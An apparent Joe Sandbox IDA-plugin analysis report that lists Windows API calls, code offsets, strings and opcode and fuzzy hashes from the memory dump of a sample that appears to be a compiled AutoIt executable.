                                                                                                                • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                • Opcode Fuzzy Hash: 07a683c3f77dae50ee773e7e3fa5154241049f7b31449e9a489b3be5124be6a3
                                                                                                                • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                • String ID:
                                                                                                                • API String ID: 2169480361-0
                                                                                                                • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32 ref: 00448CB8
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 312131281-0
                                                                                                                • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                APIs
                                                                                                                • select.WSOCK32 ref: 0045890A
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastacceptselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 385091864-0
                                                                                                                • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1358664141-0
                                                                                                                • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880819207-0
                                                                                                                • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                Similarity
                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 357397906-0
                                                                                                                • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Similarity
                                                                                                                • API ID: DeleteDestroyObject$IconWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3349847261-0
                                                                                                                • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                                • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                • String ID:
                                                                                                                • API String ID: 2223660684-0
                                                                                                                • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                                                • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                                • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                                • EndPath.GDI32(?), ref: 004472B0
                                                                                                                • StrokePath.GDI32(?), ref: 004472BE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 2783949968-0
                                                                                                                • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                APIs
                                                                                                                • GetDesktopWindow.USER32 ref: 00471144
                                                                                                                • GetDC.USER32(00000000), ref: 0047114D
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                                • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                APIs
                                                                                                                • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                                                • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                                                • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2710830443-0
                                                                                                                • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                                                • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                                                • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                                                  • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                                                  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 146765662-0
                                                                                                                • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                                                • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                                                APIs
                                                                                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                  • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CopyVariant$ContainedObject$ErrorLast
                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                • API String ID: 4053020530-3941886329
                                                                                                                • Opcode ID: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                                                • Opcode Fuzzy Hash: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0045435B
                                                                                                                • GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 00454371
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: AU3_FreeVar
                                                                                                                • API String ID: 190572456-771828931
                                                                                                                • Opcode ID: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                                                • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                • Opcode Fuzzy Hash: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                                                • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                APIs
                                                                                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Connection
                                                                                                                • String ID: LPT$HH
                                                                                                                • API String ID: 1722446006-2728063697
                                                                                                                • Opcode ID: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                                                • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                                • Opcode Fuzzy Hash: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                                                • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: HH$HH
                                                                                                                • API String ID: 0-1787419579
                                                                                                                • Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                                                • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                • Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                                                • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: '
                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                APIs
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
